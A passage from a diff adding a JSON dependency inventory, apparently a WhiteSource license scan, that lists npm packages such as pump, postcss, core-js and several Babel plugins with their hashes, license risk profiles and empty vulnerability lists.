"https://www.npmjs.org/package/pump" + }, + "matchType": "SHA1", + "sha1": "b4a2116815bde2f4e1ea602354e8c75565107a64", + "name": "pump-3.0.0.tgz", + "artifactId": "pump-3.0.0.tgz", + "version": "3.0.0", + "groupId": "pump", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d313c875-f33e-48bf-b85c-af3a8c925912" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f9c4607c-b70f-4455-a7ae-8177910db869", + "keyId": 28056942, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cyclist/-/cyclist-1.0.1.tgz", + "homePage": "https://github.com/mafintosh/cyclist", + "genericPackageIndex": "https://www.npmjs.org/package/cyclist" + }, + "matchType": "SHA1", + "sha1": "596e9698fd0c80e12038c2b82d6eb1b35b6224d9", + "name": "cyclist-1.0.1.tgz", + "artifactId": "cyclist-1.0.1.tgz", + "version": "1.0.1", + "groupId": "cyclist", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5f17f755-3edc-4ff6-8e2c-cb174010a956" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7f490480-bb38-4594-a2c8-77acf88b3de0", + "keyId": 28650442, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/minimal/-/minimal-5.8.0.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/minimal", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/minimal" + }, + "matchType": "SHA1", + "sha1": "b7ad5113504ab67f1ef2b0f465b7ba608e6b8dc5", + "name": "minimal-5.8.0.tgz", + "artifactId": "minimal-5.8.0.tgz", + "version": "5.8.0", + "groupId": "@sentry/minimal", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/171b2fd8-845e-40d6-8ccc-eb08b8c223aa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "67c199c2-0228-41a8-acd7-081ccd82d9a5", + "keyId": 28582965, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-get-function-arity/-/helper-get-function-arity-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-get-function-arity" + }, + "matchType": "SHA1", + "sha1": "c604886bc97287a1d1398092bc666bc3d7d7aa2d", + "name": "helper-get-function-arity-7.7.0.tgz", + "artifactId": "helper-get-function-arity-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-get-function-arity", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-get-function-arity/v/7.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b382f452-51d2-4ec2-8be5-297210f287dc", + "keyId": 28505109, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss/-/postcss-7.0.21.tgz", + "homePage": "https://postcss.org/", + "genericPackageIndex": "https://www.npmjs.org/package/postcss" + }, + "matchType": "SHA1", + "sha1": "06bb07824c19c2021c5d056d5b10c35b989f7e17", + "name": "postcss-7.0.21.tgz", + "artifactId": "postcss-7.0.21.tgz", + "version": "7.0.21", + "groupId": "postcss", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c6411402-8c40-4e64-b070-d2d2d366a426", + "keyId": 28306798, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bowser/-/bowser-2.7.0.tgz", + "homePage": "https://github.com/lancedikson/bowser", + "genericPackageIndex": "https://www.npmjs.org/package/bowser" + }, + "matchType": "SHA1", + "sha1": "96eab1fa07fab08c1ec4c75977a7c8ddf8e0fe1f", + "name": "bowser-2.7.0.tgz", + "artifactId": "bowser-2.7.0.tgz", + "version": "2.7.0", + "groupId": "bowser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/bowser" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "df1e01c1-0cd8-4def-8f9c-f57ac82420ed", + "keyId": 28586089, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-remap-async-to-generator" + }, + "matchType": "SHA1", + "sha1": "4d69ec653e8bff5bce62f5d33fc1508f223c75a7", + "name": "helper-remap-async-to-generator-7.7.0.tgz", + "artifactId": "helper-remap-async-to-generator-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-remap-async-to-generator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c7d93faa-beb3-432e-83b2-83d7795bfc64" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9e22ed85-da72-42ee-b78b-90099943b810", + "keyId": 26948541, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/iferr/-/iferr-0.1.5.tgz", + "homePage": "https://github.com/shesek/iferr", + "genericPackageIndex": "https://www.npmjs.org/package/iferr" + }, + "matchType": "SHA1", + "sha1": "c60eed69e6d8fdb6b3104a1fcbca1c192dc5b501", + "name": "iferr-0.1.5.tgz", + "artifactId": "iferr-0.1.5.tgz", + "version": "0.1.5", + "groupId": "iferr", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/iferr" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4df63356-b590-4d97-a69e-08cb2ac067cf", + "keyId": 26966815, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stream-each/-/stream-each-1.2.3.tgz", + "homePage": "https://github.com/mafintosh/stream-each", + "genericPackageIndex": "https://www.npmjs.org/package/stream-each" + }, + "matchType": "SHA1", + "sha1": "ebe27a0c389b04fbcc233642952e10731afa9bae", + "name": "stream-each-1.2.3.tgz", + "artifactId": "stream-each-1.2.3.tgz", + "version": "1.2.3", + "groupId": "stream-each", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/668718ca-b10a-4e85-8348-0af2bf51ac52" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "692c365d-b740-4c2e-8551-c39c99d4a50e", + "keyId": 28586076, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-modules-umd" + }, + "matchType": "SHA1", + "sha1": "d62c7da16670908e1d8c68ca0b5d4c0097b69966", + "name": "plugin-transform-modules-umd-7.7.0.tgz", + "artifactId": "plugin-transform-modules-umd-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-modules-umd", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-modules-umd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0bdc58e6-2ede-4ff0-bce2-2f6e79c63e4d", + "keyId": 27030115, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/whatwg-fetch/-/whatwg-fetch-3.0.0.tgz", + "homePage": "https://github.com/github/fetch#readme", + "genericPackageIndex": "https://www.npmjs.org/package/whatwg-fetch" + }, + "matchType": "SHA1", + "sha1": "fc804e458cc460009b1a2b966bc8817d2578aefb", + "name": "whatwg-fetch-3.0.0.tgz", + "artifactId": "whatwg-fetch-3.0.0.tgz", + "version": "3.0.0", + "groupId": "whatwg-fetch", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/54b278e0-b0e7-4b76-b7f6-43c2025dc96c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "32dfd6c2-bbc6-4c5c-9353-427a3ffc5b77", + "keyId": 28586038, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.7.0.tgz", + "homePage": "https://github.com/babel/babel/tree/master/packages/babel-plugin-transform-regenerator", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-regenerator" + }, + "matchType": "SHA1", + "sha1": "f1b20b535e7716b622c99e989259d7dd942dd9cc", + "name": "plugin-transform-regenerator-7.7.0.tgz", + "artifactId": "plugin-transform-regenerator-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-regenerator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-regenerator" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9c24c1a6-bfbc-4ddd-8091-65d83ba89f27", + "keyId": 26965426, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pumpify/-/pumpify-1.5.1.tgz", + "homePage": "https://github.com/mafintosh/pumpify", + "genericPackageIndex": "https://www.npmjs.org/package/pumpify" + }, + "matchType": "SHA1", + "sha1": "36513be246ab27570b1a374a5ce278bfd74370ce", + "name": "pumpify-1.5.1.tgz", + "artifactId": "pumpify-1.5.1.tgz", + "version": "1.5.1", + "groupId": "pumpify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/pumpify" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8723a311-10ae-4526-bc6f-8a71edba3c51", + "keyId": 28062747, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parallel-transform/-/parallel-transform-1.2.0.tgz", + "homePage": "https://github.com/mafintosh/parallel-transform#readme", + "genericPackageIndex": "https://www.npmjs.org/package/parallel-transform" + }, + "matchType": "SHA1", + "sha1": "9049ca37d6cb2182c3b1d2c720be94d14a5814fc", + "name": "parallel-transform-1.2.0.tgz", + "artifactId": "parallel-transform-1.2.0.tgz", + "version": "1.2.0", + "groupId": "parallel-transform", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/mafintosh/parallel-transform.git" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "18273c94-6806-4c8b-a066-e28ad44990cd", + "keyId": 27166648, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/duplexify/-/duplexify-3.7.1.tgz", + "homePage": "https://github.com/mafintosh/duplexify", + "genericPackageIndex": "https://www.npmjs.org/package/duplexify" + }, + "matchType": "SHA1", + "sha1": "2a4df5317f6ccfd91f86d6fd25d8d8a103b88309", + "name": "duplexify-3.7.1.tgz", + "artifactId": "duplexify-3.7.1.tgz", + "version": "3.7.1", + "groupId": "duplexify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bdbfdb43-5d33-4f3f-aa5f-be25c8260b06" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e7103bb3-9304-4728-a434-88f649d553f5", + "keyId": 26954617, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/copy-concurrently/-/copy-concurrently-1.0.5.tgz", + "homePage": "https://www.npmjs.com/package/copy-concurrently", + "genericPackageIndex": "https://www.npmjs.org/package/copy-concurrently" + }, + "matchType": "SHA1", + "sha1": "92297398cae34937fcafd6ec8139c18051f0b5e0", + "name": "copy-concurrently-1.0.5.tgz", + "artifactId": "copy-concurrently-1.0.5.tgz", + "version": "1.0.5", + "groupId": "copy-concurrently", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/eb2a8c79-5d24-4c40-8a51-3c1b23306f62" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "779d9cb4-f68b-4ea2-a377-8e301eb7ee89", + "keyId": 26948676, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "homePage": "https://github.com/isaacs/inflight", + "genericPackageIndex": "https://www.npmjs.org/package/inflight" + }, + "matchType": "SHA1", + "sha1": "49bd6331d7d02d0c09bc910a1075ba8165b56df9", + "name": "inflight-1.0.6.tgz", + "artifactId": "inflight-1.0.6.tgz", + "version": "1.0.6", + "groupId": "inflight", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/inflight" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "716d884a-ff9c-4bfd-9c58-6b0f9e625ada", + "keyId": 28657480, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001009.tgz", + "homePage": "https://github.com/ben-eb/caniuse-lite#readme", + "genericPackageIndex": "https://www.npmjs.org/package/caniuse-lite" + }, + "matchType": "SHA1", + "sha1": "69b77997b882a7aee6af24c8d7d2fa27ee41f348", + "name": "caniuse-lite-1.0.30001009.tgz", + "artifactId": "caniuse-lite-1.0.30001009.tgz", + "version": "1.0.30001009", + "groupId": "caniuse-lite", + "licenses": [ + { + "name": "CC BY 4.0", + "url": "http://spdx.org/licenses/CC-BY-4.0", + "riskLevel": "unknown", + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/caniuse-lite" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b50ae12f-08df-4165-9768-238d40f0574f", + "keyId": 28644398, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/core-js/-/core-js-3.4.1.tgz", + "homePage": "https://github.com/zloirock/core-js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/core-js" + }, + "matchType": "SHA1", + "sha1": "76dd6828412900ab27c8ce0b22e6114d7ce21b18", + "name": "core-js-3.4.1.tgz", + "artifactId": "core-js-3.4.1.tgz", + "version": "3.4.1", + "groupId": "core-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9d06c4b2-3d68-4602-b965-d5eea3545ca7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b4f6e708-4ef9-424f-a46a-82de44516354", + "keyId": 27923844, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", + "homePage": "https://github.com/isaacs/rimraf#readme", + "genericPackageIndex": "https://www.npmjs.org/package/rimraf" + }, + "matchType": "SHA1", + "sha1": "35797f13a7fdadc566142c29d4f07ccad483e3ec", + "name": "rimraf-2.7.1.tgz", + "artifactId": "rimraf-2.7.1.tgz", + "version": "2.7.1", + "groupId": "rimraf", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d1e5ab11-08ff-45ec-8735-9ddb67c9ef96" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e4d104c-c404-424d-9916-2054c983ff8f", + "keyId": 28588523, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parse5/-/parse5-5.1.1.tgz", + "homePage": "https://github.com/inikulin/parse5", + "genericPackageIndex": "https://www.npmjs.org/package/parse5" + }, + "matchType": "SHA1", + "sha1": "f68e4e5ba1852ac2cadc00f4555fff6c2abb6178", + "name": "parse5-5.1.1.tgz", + "artifactId": "parse5-5.1.1.tgz", + "version": "5.1.1", + "groupId": "parse5", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7e60828d-1d05-4db7-a7ef-a10075166421" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0803ea3f-acdc-4dc7-9c7b-627119e41bd5", + "keyId": 28615966, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.3.306.tgz", + "homePage": "https://github.com/kilian/electron-to-chromium#readme", + "genericPackageIndex": "https://www.npmjs.org/package/electron-to-chromium" + }, + "matchType": "SHA1", + "sha1": "e8265301d053d5f74e36cb876486830261fbe946", + "name": "electron-to-chromium-1.3.306.tgz", + "artifactId": "electron-to-chromium-1.3.306.tgz", + "version": "1.3.306", + "groupId": "electron-to-chromium", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/electron-to-chromium/v/1.3.306" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dfc640c5-83d9-4719-8752-874b08a7a455", + "keyId": 28244931, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "homePage": "https://github.com/mafintosh/end-of-stream", + "genericPackageIndex": "https://www.npmjs.org/package/end-of-stream" + }, + "matchType": "SHA1", + "sha1": "5ae64a5f45057baf3626ec14da0ca5e4b2431eb0", + "name": "end-of-stream-1.4.4.tgz", + "artifactId": "end-of-stream-1.4.4.tgz", + "version": "1.4.4", + "groupId": "end-of-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b60b38e3-bc5b-4979-8cad-f8546a7f77c1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7442811b-88cb-40ca-86f1-1a26226facc9", + "keyId": 28586047, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-dynamic-import/-/plugin-proposal-dynamic-import-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-dynamic-import" + }, + "matchType": "SHA1", + "sha1": "dc02a8bad8d653fb59daf085516fa416edd2aa7f", + "name": "plugin-proposal-dynamic-import-7.7.0.tgz", + "artifactId": "plugin-proposal-dynamic-import-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-proposal-dynamic-import", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8699b08a-07ef-4c98-ae8d-a62b9ca898ff" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e3eadfee-44af-4f76-aa64-3070d23690d3", + "keyId": 28585468, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.7.0.tgz", + "homePage": "https://github.com/thlorenz/convert-source-map", + "genericPackageIndex": "https://www.npmjs.org/package/convert-source-map" + }, + "matchType": "SHA1", + "sha1": "17a2cb882d7f77d3490585e2ce6c524424a3a442", + "name": "convert-source-map-1.7.0.tgz", + "artifactId": "convert-source-map-1.7.0.tgz", + "version": "1.7.0", + "groupId": "convert-source-map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/convert-source-map/v/1.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0fd93dd8-cd0d-4d09-b23f-83cc01eff55c", + "keyId": 28582977, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-function-name" + }, + "matchType": "SHA1", + "sha1": "44a5ad151cfff8ed2599c91682dda2ec2c8430a3", + "name": "helper-function-name-7.7.0.tgz", + "artifactId": "helper-function-name-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-function-name", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a9079888-abe7-49f6-bb8d-4173a44cd298" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2a35553a-4f54-450c-8adb-d8f7cfd75ff7", + "keyId": 28586041, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-named-capturing-groups-regex/-/plugin-transform-named-capturing-groups-regex-7.7.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-named-capturing-groups-regex" + }, + "matchType": "SHA1", + "sha1": "358e6fd869b9a4d8f5cbc79e4ed4fc340e60dcaf", + "name": "plugin-transform-named-capturing-groups-regex-7.7.0.tgz", + "artifactId": "plugin-transform-named-capturing-groups-regex-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-named-capturing-groups-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-named-capturing-groups-regex" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5eebc94b-b870-467a-8f83-f8d7178da62f", + "keyId": 27240542, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/limiter/-/limiter-1.1.4.tgz", + "homePage": "https://github.com/jhurliman/node-rate-limiter#readme", + "genericPackageIndex": "https://www.npmjs.org/package/limiter" + }, + "matchType": "SHA1", + "sha1": "87c9c3972d389fdb0ba67a45aadbc5d2f8413bc1", + "name": "limiter-1.1.4.tgz", + "artifactId": "limiter-1.1.4.tgz", + "version": "1.1.4", + "groupId": "limiter", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/263b3412-9ac0-4a5f-9f67-697c9158a2fd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6860b155-bf09-4e91-921e-5c77e404c59e", + "keyId": 28670261, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/npm-audit-resolver/-/npm-audit-resolver-2.1.0.tgz", + "homePage": "https://github.com/naugtur/npm-audit-resolver#readme", + "genericPackageIndex": "https://www.npmjs.org/package/npm-audit-resolver" + }, + "matchType": "SHA1", + "sha1": "46d3cd9e40b72ecda5bf00173d35b7732510acbc", + "name": "npm-audit-resolver-2.1.0.tgz", + "artifactId": 